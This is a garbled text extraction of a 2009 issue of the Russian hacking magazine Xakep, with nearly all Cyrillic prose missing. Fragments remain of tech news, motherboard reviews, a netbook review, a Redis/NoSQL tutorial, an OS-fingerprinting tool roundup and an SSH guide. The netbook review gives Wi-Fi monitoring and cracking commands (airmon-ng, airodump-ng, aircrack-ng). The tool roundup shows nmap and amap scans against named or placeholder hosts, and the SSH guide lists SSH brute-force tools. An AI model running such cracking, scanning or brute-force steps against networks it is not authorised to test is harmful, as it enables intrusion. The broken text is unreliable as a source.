Хакер 2009 08 PDF

.
56
x 08 () 2009
.
210
:

08 (128) 2009
. 46
START
SQL!

fingerprinting
128
. 26
SQL

. 20

PCI DSS
. 52

, . , ,
?
,
,

, / .
,
: ,
,
.
? ,

. ,
CD
96 , , ,
. , , .
, ,
, , .
P.S. , : vkontakte.ru/
club10933209, .
.
. , ..
5-6
.
nikitozz, . .
nikitoz@glc.ru
udalite.livejournal.com
vkontakte.ru/club10933209
CONTENT
08(128)
004 MEGANEWS
FERRUM
018
ASUS EEE PC 1008HA
PC_ZONE
030
SQL
Full-guide Secure Shell
SSH'
040
060
064
076
082
110
PCI DSS
TWITTER
SYN/ACK
116
121
twitter-
X-TOOLS
070
106
066

socks-
Pythone
EASY-HACK
056
102
052
098
, SQL!
036
046
092
GUI PYTHON!
026
088
014
020
126
130
132
SCCM:
IT-
IN DA FOCUS
136
140
MegaFAQ Linux
143
IM, Skype, P2P
Linux VServer
Linux - 2009
PAM'
144
PSYCHO:
FAQ UNITED
FAQ
8.5
WWW2
web-
,
! .
, .

,
: ,
,
.
, :
,
, , ,
.
.

, security level
!
/
>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, SYN\ACK PSYCHO
Andrushock
(andrushock@real.xakep.ru)
Dr. Klouniz
(alexander@real.xakep.ru)
Dlinyj
(dlinyj@real.xakep.ru)
>

(lyashchenko@gameland.ru)
/ART
>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)
/DVD
>
Step
(step@real.xakep.ru)
> Unix-
Ant
>

/PUBLISHING
>

119021, , . ,
. 11, . 44-45
.: +7 (495) 935-7034
: +7 (495) 780-8824
>

>

>

>

>

>

>PR-

>

>

>

/ .: (495) 935-7034, : (495) 780-8824

> GAMES & DIGITAL
(goryacheva@gameland.ru)
>

START
046
070
Fedora 11
Leonidas
102

>

>
(strekneva@gameland.ru)
>

> -

>

(andrey@gameland.ru)
>

(devald@gameland.ru)
>

(kosheleva@gameland.ru )
>

(goncharova@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24
>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,

,

77-11802 14
2002 .

Lietuvas Rivas, .
100 000 .
.

.
:

. ,

,
.
.

.
.

:
content@gameland.ru
, , 2009

.
_ssh3r1ff(ssh3r1ff@gmail.com). .
>> meganews
J3
PC27
PC27
J3
MIFRILL / MIFRILL@R EAL.XAKEP.RU /

- ,
Apple .
2004 , ,
- ,
, . ,
!
Apple
, ,
. , ,
, excellent,
, ,
.
TWITTER
14%
21 .
, 300 ?
, , ,
,
MMOG. ,
, ,
. ,
, , , ( ). , .
,
.
. ,
MMORPG. , ,
:).
GOOGLE WAVE
100.000 30- (
).
004
X 08 /128/ 09
>> meganews
PC27
- ,
. ,
- , , ,
, . eMachines
( Acer) eMachines EZ1601-01
,
:
$400. ,
,
... . Intel Atom N270 (1.6 ),
Intel GMA 950, 1
(DDR2-533 ), 160
(SATA), ,
8x DVDR/RW DL SuperMulti.
. ,
, , , 18.5.
. C :
,
.
.
PC27
POSITIVE TECHNOLOGIES
,
74%

PCI DSS.
TPB
, The
Pirate Bay , ,
. ,
,
, ,
http://thevideobay.
org.
YouTube, , ,

. ,
Flash, HTML 5
<video> <audio>. ,
(, IE
).
, VideoBay : Firefox
3.5, Opera 9.52 preview, Google Chrome 3,
Safari 3.4 Safari 4.
.
Usenet
, ( ) Pirate Bay .
, .
, , , Usenet. -, ,
( 80-
) . , , Usenet
, , ,
. RIAA
, - ,
2007 Usenet.com Inc.
- -.
, .
, ,
\ Usenet.com.
006
X 08 /128/ 09
>> meganews
PC27
J3
Google

GMail

SMS.
,
Google ,
SMS
.
: GMail
,
,
.
,
, ,
help, Google
-

(

).
help ,

. -
!.
,
( ,
,
, IP),
,

.
IDC , 2008

67%.
Sony
, . Sony
10- VAIO
W.
Sony :
, .
.
: Intel Atom
N280 1.66 , 1 , 160
, - 3.1 , Bluetooth, Wi-Fi 802.11
b/g/n, LAN USB-. 10.1 ( 16:9), 1366768
. 3 .
$499.
.
MESSAGELABS,

90.4%.

5- , Production Godskitchen
Camel Urban Wave, Camel Zeppelin Production. ,
, ,
. -
: , , .
008
X 08 /128/ 09
>> meganews
Google Chrome OS

Nero, Google.
,
,
,
.
, :

,
Chrome OS

2010 . Linux,
x86 ARM . Chrome OS
, , open source
! ,
- , . Android Chrome OS
, ,
.
, Google .

.
, ,
. -
, . fail SGAE,
. , SGAE eD2K-
elrincondejesus.com.

, - . P2P-, , ,
,
. . ,
,

. , . ,
, .
Imagine Cup 2009

()
Microsoft
Imagine Cup 2009.
2003 Microsoft
. , ,
. . .
Vital Lab , ,
Imagine cup Software Design (
). ViVa,
:
, ,
. 69 ,
SYTECH.

!

Trend Micro , Symbian OS.
, Symbian Foundation,
. . ,
, Sexy Space,
ACSServer.exe, , ,
.
, ,
. ,
SMS-
.
Fanta
Fanta Fanta
. :
, ,
50 !
Fanta 0,5 ., 1 .
2 . .
X 08 /128/ 09
009
>> meganews
? ?
Google GMail ,
Labs .

eBay PayPal,
.
DKIM,
, , ,
.
.
(
, , ,
).
15- MICROSOFT

MICROSOFT OFFICE 2000,
10 .
Microsoft coming
soon
Apple, , Microsoft
, .
,
,
- Microsoft Worldwide Partner Conference.
Microsoft ,
Windows 7. ,
Apple,
, , . Microsoft
,
, .
USB 3.0 SATA 6 Gbit/s

, , ,
USB 3.0. , ASUSTeK Computer! Asus P6X58
Premium Computex 2009,
SATA-600. , , USB
3.0 , ,
. (4.8 / 600 /)
SSD- :). USB 3.0
NEC 720200, ,
USB- .
, P6X58 Premium ,
. X58,
Core i7 ( Socket LGA1366) : 6 DIMM- DDR3; 3 PCI Express 2.0
16, 1 PCI Express 1 2 PCI; 1 IDE- 6 SATA II; 2
Ethernet-; 7.1 , 2 PS/2, 6 USB 2.0, FireWire, S/PDIF-
RJ-45.
.
010
X 08 /128/ 09
>> meganews
Project Natal
Windows
, Microsoft E3. Project Natal
X-Box 360,
. Natal
,
( )
, , .
,
,
. Microsoft , Natal Windows . ,
,
(, , ,
, ), .
.
!
,
,

,
, , ,
. ? , ,

.
Nokia,
Sony Ericsson, Motorola, Apple, LG,

NEC, Qualcomm, Research in Motion,
Samsung Texas Instruments, , 2010

micro USB
( mini USB). ,

30
!

INTERPRET ,

X 08 /128/ 09
36% .
11

30 Windows 7, ,
, . ? , !
, .
Velle - ,
.
:
Velle

Velle
Velle ,
VITAVEN, Velle

www.velleoats.com
X 07 /127/ 09
053
>> ferrum
:

, . ,
(, ) , . - , -
,
, , Intel X58.
,
58, LGA1366. ,
Intel Nehalem
DDR3 (),
. QPI
25.6 /.
ICH10R
6 PCIe x1 12 USB.

nVidia SLI,
Intel.
,

, nVidia .
, , SLI . ,
,
,
. 36 PCI-E 2.0,
, 3-way
SLI PCI-E 8x. ,
, ,
16 ,
,
nVidia nForce 200, 16 PCI-E.
,
, .
014

,

. , 6
Kingston, JEDEC (
1.5, 1333 , 9-9-9-24).
:
Lavalys Everest 5 ( )
Passmark Perfomance Test 6.1.

Microsoft Windows XP SP3,
BIOS
.
,
,
: Intel Core i7 Extreme 965

, : 6, Kingston KVR1333D3N9K3/6G
: Gigabyte GV-N28-1GH-B (
NVIDIA GTX280)
, : 192, SSD-
Transcend TS192GSSD25S-M
: Sony NEC Optiarc AD7200S
: Noctua NH-C12P
, : 720, Enermax Infiniti
BIOS,
,
.
,
.

LAVALYS EVEREST
MSI Eclipse SLI
Intel DX58SO
Gigabyte EX58-Extreme
ECS X58B-A
Everest memory
benchmarkCopy(M/)
Everest memory
benchmarkWrite(M/)
Everest memory
benchmarkRead(M/)
ASUS P6T6 WS Revolution

ASRock X58 Deluxe
0 2000 4000 6000 8000 10000 12000 14000 16000 18000
X 08 /128/ 09
>> ferrum
ASRock X58
Deluxe
7520 .
:
: Intel X58 Express, Intel ICH10R
: DDR3 800/1066/1333/1600/1866/2000
non-ECC
BIOS: AMI BIOS
: PCI (3 .), PCI-E x16 (4.)
: 24- 8- , 5
( ),
IEEE1394a, USB 2.0 (3 .), IR, -
, CD-in, COM, HDMI-S/PDIF
: SATA 2.0 (6 .), IDE, Floppy
RAID: 0/1/5/10, Intel Matrix Storage
: PS/2, S/PDIF ( ), RJ-45, IEEE1394a, USB 2.0 (6 .), eSATA, MiniJack 3.5 mm (6 .)
: Realtek ALC890
: Realtek RTL8111DL
ASRock X58 Deluxe

.
, .
PCI-Express 2.0 ( 16 )
PCI 2.0, SATA II, IDE floppy;
USB USB\eSATA
. DDR3
1866 .
10 ,
2000 . , PCI-E
PCI 3 nVidia (SLI-
3 ) 4 ATI (CrossFire-
).
. BIOS ,
.
X 08 /128/ 09
ASUS P6T6 WS
12500 .
Revolution
:
: Intel X58 Express + NVIDIA nForce 200,
Intel ICH10R
: DDR3 800/1066/1333/1600/1866/2000
non-ECC
BIOS: AMI BIOS
: PCI-E x16 (3 .), PCI-E x8 (2 .), PCI-E x4 (1 .)
: 24- 8- , 5
( ),
IEEE1394a, USB 2.0 (3 .), IR, -
, CD-in
: SATA 2.0 (6 .), SAS (2 .)
RAID: 0/1/5/10
: PS/2, S/PDIF( ), RJ-45, IEEE1394a, USB 2.0 (6 .), eSATA (2 .), MiniJack 3.5 mm (6
.)
: Realtek ALC890
: Realtek RTL8111DL
Revolution
! , LPT COM,
PCI IDE.
PS/2. : PCI-E 2.0, eSATA,
SATA II SATA\SAS.
,
molex.
PCI-Express 2.0 16
nVidia nForce 200.
8, 4.
, , ,
,
.
015
>> ferrum
10600 .
8100 .
ECS Black
X58B-A
:
: DDR3 800/1066/1333/1600 non-ECC
BIOS: AMI BIOS
: PCI (1 .), PCI-E x16 (2 .), PCI-E x4 (1 .),
PCI-E x1 (2 .)
: 24- 8- , 5
( ),
IEEE1394a, USB 2.0 (3 .), IR, -
, CD-in, IEEE1394a, S/PDIF,
: SATA 2.0 (6 .), eSATA 2 .
RAID: 0/1/0+1/5
: PS/2, RJ-45, IEEE1394a, USB 2.0 (6 .),
eSATA (2 .), MiniJack 3.5 mm (6 .)
: Realtek ALC888S-VC
: Realtek RTL8111C
Gigabyte
GA-EX58-Extreme
:
: DDR3 800/1066/1333/2100+ nonECC
BIOS: Award BIOS
: PCI (2 .), PCI-E x16 (2 .), PCI-E x1 (1 .),
PCI-E x4 (1 .), PCI-E x8 (1 .)
: 24- 8- , 4
( ),
IEEE1394a (2 .), USB 2.0 (2 .), - , CD-in
: SATA 2.0 (10 .), IDE, Floppy
RAID: 0/1/5/10
: PS/2, S/PDIF( ), RJ-45 (2 .), IEEE1394a, USB 2.0 (8 .), MiniJack 3.5 mm (6 .)
: Realtek ALC889
: Realtek RTL8111D
. , , , .
, , -, POST-, Power
Reset, , BIOS,
, , .
.
eSATA,
USB FireWire.
PCI-Express 2.0 x16, PCI 2.0, PCI-Express
x4 PCI Express x1.
,
(
), . , , Gigabyte,
Ultra Durable 3.
, ,
. , Power
Reset, POST-, , ,
, BIOS.
, 10 SATA 2.0 .
,
Intel VRD 11.1

,
PCI-Express.
016
X 08 /128/ 09
>> ferrum
8050 .
10600 .
Intel
DX58SO
:
:
: DDR3 800/1066/1333/1600 non-ECC
BIOS: AMI BIOS
: PCI (1 .), PCI-E x16 (2 .), PCI-E x4 (1 .)
: 24- 8- ,
5 ( 2 ),
IEEE1394a, USB 2.0 (2 .), IR, -

: SATA 2.0 (6 .)
RAID: 0/1/5/10
: S/PDIF (), RJ-45,
IEEE1394a, USB 2.0 (8 .), eSATA (2 .), MiniJack 3.5 mm (6 .)
: Realtek ALC889
: Realtek RTL8111D
Intel, ,
,
. , ,
(4 ). ,
. PS/2 ,
eSATA. IDE
, SATA-. ,
PCI-Express x1, PCI-Express x16 4.
,
. ,
BIOS, (Power Slope),
.
BIOS .
, ,
, , .
, ,
.
,
, , -
.
Gigabyte
GA-EX58-Extreme,
X 08 /128/ 09
M Eclipse
MSI
S
SLI
:
: DDR3 800/1066/1333/1600 non-ECC
BIOS: AMI BIOS
: PCI (2 .), PCI-E x16 (3.), PCI-E x1
: 24- 8- , 6
( ),
IEEE1394a, USB 2.0 (2 .)
: SATA 2.0 (10 .), IDE
RAID: 0/1/5/10/JBOD, Intel Matrix Storage
: PS/2, RJ-45(Ethernet) 2 .,
IEEE1394a, USB 2.0 (8 .), eSATA 2 .
:
Creative Sound Blaster X-Fi Xtreme Audio
: Realtek 8111C (10/100/1000 /) 2 .
. ,
,
Creative Sound Blaster X-Fi Xtreme Audio,
. , GreenPower Genie,
BIOS MSI.
10 SATA, 2 eSATA\USB
.
POST-, , , .
.
,
(
, Intel
Core i7).
OCZ. , , , MSI, ,
.
.
Intel
DX58,
. ,
ASUS P6T6 WS Revolution
MSI Eclipse SLI. , ,
. ASUS
SAS nVidia nForce 200
. MSI
,
SATA. .z
017
>> ferrum
ASUS
Eee PC 1008HA

,
X-Toolz. ,

, . ASUS Eee PC 1008HA.
, , , : , !.
: 18 25,7 . ,
.
Eee PC 1008HA
. ,
, .
, 1.1 ,
, 10" 6
.

, ASUS .
Eee PC, ,
018
Python, .
. 1008HA
,
. ,
: ,
Shift . ,
,
14" .

(
1024 x 600) , ,
.

Visual Studio Eclipse.
X 08 /128/ 09
>> ferrum
. , , Eee PC ,
, SVN-,
.
. ,
:).
1008HA . Eee PC Intel Atom.
Atom N280 1,66 , 1
160 . Windows XP Home , - , Windows 7
. Release-candidate , Microsoft , -
. , ,
, .
VOIP
, . 13,
1008HA,
. , ,
.
VoIP- ,
.
, z SIP Skype.
1.3 , ,
. ,
-, ,
.
Bluetooth-. Bluetooth 2.1 EDR
.
?

. ,
,
. 1008HA ,

6
. - 2,900
(, ,
) ,
. , , ,
.
65%,
Komodo Edit
15% . ,
4,5-5 .
,
, . .
?
Intel Atom N280,
. 1,66
667 Intel GN40.
N270,

.
X 08 /128/ 09

,
.
, , - .
, Eee PC 1008HA
Intel. , Kismet Airocrack
.
Monitoring Mode, .

Wi-Fi Intel . 1008HA, , .
Linux
Backtrack4, ( ). ,
,
:
modprobe ath9k
airmon-ng start wlan0
airodump-ng wlan0
Wi-Fi,
airodump, . ,
, .
, ,
aircrack-ng.
!
, Eee PC ASUS
. ,
.
,
, . .
? !
ASUS
trendclub.ru. z
TREND CLUB , . Trend Club

, ,
. Trend Club Intel ASUS
.
Intel, , , , .
Intel Web- Intel www.intel.ru,
http://blogs.intel.com.
Intel www.intel.ru/rating.
019
>> pc_zone
DATA
KEY
Fox
Hash
function
DFCD3454
The red fox

runs across
the ice
Hash
function
52ED879E
The red fox

walks across
the ice
Hash
function
46042841
DISTRIBUTED
NETWORK
PEERS

/ ALEKS.RAIDEN@GMAIL.COM /
, SQL!
SQL
? SQL, ? ,
. , , SQL . . !
, ,
, ? Google, Amazon,
eBay, Twitter, Facebook
? -,
PHP+mySQL. .
, , ,
.

, ,

. ,
,

, ,
. ,

(
#125
z ). ,
- ,
020

.
.
- . -.
: ,
, , ,
.
master-slave, BDSM !
, ,
,
. ,
, .
, ( ,
)?
: ,
? ,
,
,
.
(
master-master multi-master ),
,
.

,
.
,

. , ,
. ,
.
. .

SQL-!
,
,
. ?
!
? ( ,
)
,
SQL (, X 08 /128/ 09
>> pc_zone
-. ,
, / ( );
.

- - (DHT).
, ,

, ( ,

torrent).

,

, .

MEMCACHEDB
) .

, ?

,
.
, ,

(
) .

,
? !
, SQL,
,
.
, - , .
.
.
,

.
-, ?
key-value database!
,
. , ,
:
( ) ,

. ,

.
,
.
X 08 /128/ 09

get ( ),
set ( ), delete ( ), update (
).
,
,
( ,
)
.
, ( SQL
).
.., , , ,
,
.
key-value .
,
, , ,
,

(BLOB-),
. DHT ,
, .
.
, ! ,

, (
,

).

.
, , .

. ,
!
, , ,

. ! , ,
SQL-,
,
, .

- , .
021
>> pc_zone
HTTP://WWW
links
:
http://en.wikipedia.
org/wiki/Multimaster_replication.
Google:
http://highscalability.
com/googlearchitecture.
Google
:
http://labs.google.
com/papers/bigtable.
html.
DHT:
http://ru.wikipedia.
org/wiki/DHT.
Memcached:
http://danga.com/
memcached.

Facebook:
http://github.com/
fbmarc/facebookmemcached/tree/
master.

PHP
Redis-

:
http://code.google.
com/p/redis-ajaxchat.
022
(
SQL-
-). , .
, SQL,
, .
, SQL key-value , .

,
, , .

. MemcacheDB,
memcache BerkleyDB,
. ,
Redis
.
,
,
.
, !
! ,
.
Memcached/MemcacheDB (memcachedb.org) ,
key-value DB.
, ,
, .
, ,
, ,
.
UDP- ,
, , 1.4,
. Facebook , ,
! ,

Memcached- ! ,
. , , MemcacheDB,

. ,
( ),
.
Project Voldemort (project-voldemort.com)
, , .
Java .
.
, Project Voldemort JavaAPI , ,
Google ProtoBuf Thrift,
. ,
( ),
.
,

, , .
: 10-20
VOLDEMORT
PROJECT
, , LinkedIn ,
.
CLOUD
Apache CouchDB (couchdb.apache.org)
COMPUTING
! , CouchDB ,
-.
, , -.
, (), , ,
. , ,
. Apache
CouchDB Erlang ( , ) HTTP
REST- JSON API,
JavaScripta- -!
, ,
? , JavaScript SQL.
,
. , .
Redis (code.google.com/p/redis)
,
! ?
. 100
. ,
Redis , , .
, ,
( -),
( !) .
, memcached ,
- , Redis-
! ,

key-value ( SQL,
). ANSI C
(
BSD),
. TCP
telnet. , API
. ,
- PHP, ! :)

TWITTER?!
, , ,
,
X 08 /128/ 09
>> pc_zone
VOLDEMORT
(, ,
).
. , (Twitter)
X 08 /128/ 09
.
,

.
(
).
Redis.
,
HTML- ,
,
.
0. , .
( ,
), ,
() , ( ,
).
1.
-,
,
(
, , ),
, , ,
.
JSON
,
JSON . SET
admin {name:supervasya,age:21,sex:m,re
025
>> pc_zone
COUCHDB
gistered:27.07.2009} admin.
, GET admin, JSON- .
: SET admin_pass
md5(password) , _pass, md5 .
( ,
). , : EXISTS admin,
(, ),
: GET admin_pass. . ( SELECT COUNT() ): INCR
count_user 1.
,
, , (set): SADD
all_user_list admin. , all_user_list
, .
2. . ,
, -
( !). , , , admin_11232142135,
: SET
admin_11232142135 {author:admin,text: ! ,time:
11232142135,title:!}. ,
,
. : RPUSH admin_msgs 11232142135.
admin_msgs . ?
,
, .
,
.
3. () , .
, : RPUSH admin_follow vasja. admin_follow
, admin.
, , :
RPUSH vasja _follow admin.
4. .
, . , , , .
, .
024
, .
. , .
( ): LLEN admin_follow. ,
2 ( ):
LRANGE admin_follow 0 1 .
, ,
.
.
, ,
. , N
LRANGE,
( + _msgs). ,
, Redis- ,
. ,
KEYS,
. ,
( , ).
(
,
).
,
, .
, JSON-
, 3600 (
). , 100,
.
+ , (,
),
login_time ( , Redis-e), .
, , ,
array_merge , array_sort.
,
SQL-.
,
.
Redis-
, .
,
memcached (
) MGET _,
X 08 /128/ 09
>> pc_zone
: MS SQL ,
, SQL Shield
COUCHDB
SysComments Decryptor ,
, .
,
JSON- .
-, JSON
AJAX-. JSON
,
.
admin_follow,
, , MGET, ,
.

.
admin_follow ,
LREM, ,
.
?
(SQL ) ,
,
.
,
,
. !
,
, SQL-,
- . , ,
, !
, Redis MemcachedDB, ,
- , , (
, -, )
key-value ! ,
, ! SQL-
.z
X 08 /128/ 09
025
9
TOOLS
9
TOOLS
>> pc_zone
9
TOOLS
9
TOOLS
STEP
/ STEP@GLC.RU /
9
TOOLS
9
TOOLS
9
TOOLS
9
TOOLS
9
TOOLS
9
TOOLS
9
9
TOOLS
TOOLS
9
TOOLS
9
TOOLS
9
TOOLS
9TOOLS
z . ,
, , . . ,
. , , fingerprinting.

. ,

. , ,
.
, ,

(, ,
),
, ,
, ,
.
fingeprinting,
.
fingerprinting
: FIN-, ICMP ,
ICMP TCP-.
TCP/IP
. .
, .

, TTL (
), DF ( ), TOS
(Type-Of-Service) ..
fingerprinting-
. , DF
( OpenBSD),
, DF ( ).
TTL: FreeBSD
Linux 64. ,
OS
026
, .
,

.
fingerprinting .
,
fingerprinting.
Nmap
http://nmap.org
: Unix, MacOS,
Win32
, fingerprinting
Nmap.
, -
,
, . , c
. , Nmap ,

OS Fingerprinting (
-O). ,
Nmap
. microsoft.com :).
nmap -O -PN microsoft.com
Starting Nmap 4.76 ...
Running (JUST GUESSING) : OpenBSD
4.X (86%)
Aggressive OS guesses: OpenBSD
4.3 (86%)
Nmap:
nmap -O -PN microsoft.com
Starting Nmap 5.00 ...
Running (JUST GUESSING) :
Microsoft Windows 2003 (91%)
Aggressive OS guesses: Microsoft
Windows Server 2003 SP2 (91%)
,
NMAP
-

.
, zenmap
X 08 /128/ 09
9
TOOLS
9
TOOLS
9
TOOLS
9
TOOLS
9
TOOLS
9
TOOLS
9
TOOLS
.
,
, , advanced

. ,

.
Intense
scan , . -,
Nmap

, embedded. MAC Asustek. 80
HTTP-,
,
WL500gP!
:). 5.00
,
,

.
MSRPC/
NetBIOS ,
,
.

Ncat, ,
.
,
,
Ndiff. , . -
,
,

.
p0f v2
camtuf.coredump.cx
: Unix, MacOS,
Win32
Nmap,
fingerprinting, p0f
. .. - ,
. , - IDS ( ).
p0f
, :
,
( SYN );
, (
SYN+ACK);
, ( RST+), - ,
;
X 08 /128/ 09
9
TOOLS
9
TOOLS
9
TOOLS
P0F
,
( -
).

,
NAT, ,

. p0f
, ,
Nmap
. , ,
- .
lookup, , ARIN-
!
p0f ,

(
),
.
,
.
lcamtuf.
coredump.cx/p0f-help , ,
.
THC-Amap
thc.org/thc-amap
: Unix, MacOS,
Win32
, , .

( Nmap), ,
, .
,
: ,
FTP 21, SSH 22 .. ,

, .
,
.
, ..
FTP-, 31337 ,
. !
Amap
TH. ,
>> pc_zone
9
TOOLS
. , ,
. ,

, .

SSH-, 988
, -, 29-.
Amap , .
Nmap.
: Nmap, ,
,
THC-Amap, .
:
#nmap -sS -oM results.nmap -p
1-65535 IP-
#amap -i results.nmap -o results.
amap -m
,
, - .
httprint
www.net-square.com
/httprint
: Linux, MacOS,
FreeBSD, Win32

,
. ,
HTTP , , -
027
9
TOOLS
9
TOOLS
>> pc_zone
9
TOOLS
9
TOOLS
9
TOOLS
9
TOOLS
9
TOOLS
9
TOOLS
9
TOOLS
9
9
TOOLS
TOOLS
9
TOOLS
9
NetworkMinerTOOLS
http://sourceforge.net/projects
/networkminer
: Windows
HTTP://WWW
links

fingerprint, p0f:
project.honeynet.org/
papers/finger.
ICMP fingerprint:
www.sys-security.
com/html/papers.
html.
DVD
dvd

fingerprint
DVD-.
NETWORKMINER
.
httprint.
. , , .
, , , (, mod_security.c)
ServerMask (www.port80software.com),
. Httprint .
Httprint ,
-. Apache, ISS -.
, , ADSL, .
SSL-, .
,
.

Nmap.
. , multi-threading
, .
, :
2005 .
,
Vista.
fingerprintinga?
fingerprinting .
, ,
.
, TCP/IP- . /proc/sys/net 64 . Windows RST (rst.void.ru) r57BF (broken fingers),
TCP/IP.
BSD-,
Sony Playstation 2 :).
028

. NetworkMiner

, PCAP.
,
.
,
, .
, NetworkMiner ,
, CLOUD
COMPUTING
.
,
( WLAN-
),
NetworkMiner ,
,
, .
TCP SYN SYN+ACK p0f Ettercap.
fingerprinting
DHCP-, Satori.
,
MAC-: Nmap.
ike-scan
www.nta-monitor.com/tools/ikescan
: Unix, MacOS, Win32
, ,
IKE-SCAN

VPN-.

IKE- . ,
VPN, ,
, ,
.
VPN- ike-scan . :
fingerprinting?. . VPN-,
.
fingerprinting, ike-scan,
X 08 /128/ 09
9
TOOLS
9
TOOLS
9
TOOLS
9
TOOLS
9
TOOLS
9
TOOLS
9
TOOLS
>> pc_zone
9
TOOLS
XPROBE2, UBUNTU
SATORI
SINFP
, ,
.
Xprobe2
xprobe.sourceforge.net
: Unix
. Xprobe2
fingerprinting,
Nmap , , .

honeypot TCP/IP.
. , . , pf,
OpenBSD ,
TTL, . TCP- ( -T) xprobe
.
UDP-, -U.
, Xprobe2
fingerprinting ICMP-.
, fuzzing , TCP/IP, . ,
, , Xprobe -
, ,

.
X 08 /128/ 09
Satori
http://myweb.cableone.net/xnih
: Windows, Linux
Satori ,
OC fingerprinting, , , .
,
WinPCap,
, .
Satori Windows,
HP ( HP Swith Protocol), Cisco (
CDP-). ,
Satori, , DHCP. ,
,
. . Satori,
SAM, ARP- .
SinFP
www.gomor.org/bin/view/Sinfp/WebHome
: Unix, Windows
SinFP ,
,
.
. , Nmap
TCP/IP-, SinFP
. Perl,
,
. CPAN: search.
cpan.org/~gomor/Net-SinFP. , SinFP
, . z
029
>> pc_zone
STEP
/ STEP@GAMELAND.RU /

SSH
FULL-GUIDE SECURE SHELL
! . SSH Telnet,
, , .

Secure Shell .
1:
SSH-
SSH,
.
PuTTY (www.chiark.greenend.org.uk)
SecureCRT (www.vandyke.com), .
, PuTTY .

. , ,
, UNIX.
, Visualhack++.

: Raw, Telnet, Rlogin, FTP (SFTP), SSH1,
SSH2. , PuTTY ,
030
(putty.exe) :
puttygen rsa/dsa ,
;
pagent ,
,
;
plink
putty;
pscp , ;
psftp ftp- , ,
..
.
PuTTY,
SecureCRT.
? , ,
. -
, PuTTY , ,
.
,

,
PuTTY Connection Manager (puttycm.free.
fr). , -
PuTTY,
,
. , SSH-
-
(putty.exe), PuTTY Connection Manager
, .

#
PuTTY.

:
X 08 /128/ 09
>> pc_zone
PUTTY CONNECTION MANAGER

;

. ,
,

;

;
,

;
AES; , DLL-.
2:

/. ,
,
( ,
). PuTTY . PuTTY

SSH-,
,
. , ,
,
. .
Sessions.
IP- , , .
,
X 08 /128/ 09
. Connection
Data Auto-login username
(, UserAcc).
Sessions.
Saved Sessions ( ) , , session1, Save.
,
PuTTY, Saved Sessions, Load
Open. ,
. SSH
,
.

(/)
SSH- .
PuTTYgen,
. , ,
.
. OpenSSH
/.ssh/
authorized_keys2 :
mkdir ~/.ssh
chmod 700 ~/.ssh
vi ~/.ssh/authorized_keys2
ssh-dss AAAAB3NzaC1kc3MAAAE [.
. .] Huw2FekFNM7pMgEQi57k= dsakey-20061205
chmod 600 ~/.ssh/authorized_keys2
/
,

.
,
(SSH Auth Private key file
for authentification). ,

.
.
Pageant,

PuTTY.
,
sshproxy (sshproxy-project.org/
about), Python.
.
, ,
DMZ-.
SSH-,
sshproxy
.
,
, ,
.
3:
, SSH . .
, SSH-,

.
031
>> pc_zone
INFO
info

SSH:
SSH Brute
Forcer (www.
securiteam.com/
tools/5QP0L2K60E.
html)
SSHatter
(freshmeat.net/
projects/sshatter)
SSH BruteForcer
(www.darkc0de.com/
bruteforce)
THC Hydra (www.thc.
org/thc-hydra)
DVD
dvd

DVD.
SSH-
MOBASSH
FREESSHD
, .
.
PuTTY.
PuTTY :

Session Host Name (_ssh_), Port (22),
Protocol (SSH);
Connection/SSH/Tunnels, Add
new forwarded port, Source port (_
, , 666), Destination (___
:3306);
Local .
, 127.0.0.1 ,
Source Port (, 666).
unix- :
ssh -L666:___: -n
@_ssh_
MySQL, VNC-
..
4:
CLOUD
2-HOP TUNNEL
COMPUTING
2- ssh (2-hop ssh tunnel)?

SSH
,
, VNC ( ).
, : ,
( - ). ,
, , two hop tunneling
(, , ).
: ssh,
,
,
(
).

Symbian:
PuTTY for Symbian OS (s2putty.sourceforge.net)
Windows Mobile:
PocketPuTTY (www.pocketputty.net)
Java:
MidpSSH (www.xk72.com/midpssh)
iPhone:
iSSH (www.zinger-soft.com)
myhome.example.org,
gateway.example.com, SSH-
server.example.com.
- .
myhome.example.org :
ssh -f -N -L 51526:server.example.com:22 -2
gateway.example.com
! , SSH- 51526
myhome.example.org
(server.example.com). ,
server.example.
com:22,
51526, SSH.
032
X 08 /128/ 09
>> pc_zone
WINSCP
:
REMOTE
DESKTOP SSH
,
,
49152-65535.
5:
SSH-
.
- OpenSSH,
. ( , , ..)
DropBear (matt.ucc.asn.au/
dropbear/dropbear.html). , ,
SSH- ,
. OpenSSH
DropBear ,
. , WinSSHD (www.bitvise.com/
winsshd). WinSSHD
MobaSSH (mobassh.mobatek.net)
. , SSH- ,
Install.
.
MobaSSH
,
, OpenSSH,
Cygwin.

(ls dir
..). .
/cygdrive.
,
UNC-:
//<LAN_WORKSTATION>, /registry.
X 08 /128/ 09
MobaHwInfo:

MobaSwInfo:

MobaTaskList, MobaKillTask:
TCPCapture:
scp, sftp:
ssh-
rsync, wget:

MobaSSH 100% .
,
freeSSHd (www.
freesshd.com). ; ,
, ,
.
cmd.exe. , ,
, ,
,
, , , SFT ..
6:

Plink, PuTTY.

,
, . :
plink my-ssh-session

. ,
.
, -

. -
,
MyEnTunnel (nemesis2.qx.net/pages/
MyEnTunnel).

SSH-. : Plink.
( ,
-
), MyEnTunnel
Plink.
. ,
:
Slow Polling MyEnTunnel . ,
,
Wine .
7:

SSH,
(Secure file
transfer), SFTP (SSH File Transfer Protocol)
SCP (Secure CoPy).
SSH,

:
, ,
,
.
033
>> pc_zone
WinSCP (www.winscp.
net). , .
,
, , . , WinSCP
Pageant
.
, - ?
, , ,
SSH. ExpanDrive (www.expandrive.com),
SFtpDrive,
, , , .
,
- :).
8:
: ,
, , .
.
Telnet/SSH
Tera Term (http://www.ayera.com/teraterm). ,
-, Web
Accept HTTP Connections.
,
, . SSH-,
, .
, WebShell
(www-personal.umich.edu/~mressl/webshell).
Python,
. Ajax,
, (,
).
9: RDP SSH
SSH- VNC RPD
. RPD-
WiSSH (www.wissh.com). WiSSH Gateway SSH-
: Windows 2000 Terminal Servers; Windows 2003 Terminal Servers;
Windows NT Terminal Server Edition; Windows XP Windows 2000/2003
Remote Desktop.
, .
10:
. PuTTY Connection Manager
,
. , . ClusterSSH
(clusterssh.sourceforge.net)
. SSH-
, .
, , , .. SSH-.
. ,
. ClusterSSH xterm
, Perl/TK.
11:
.
034
MYENTUNNEL , SSH-

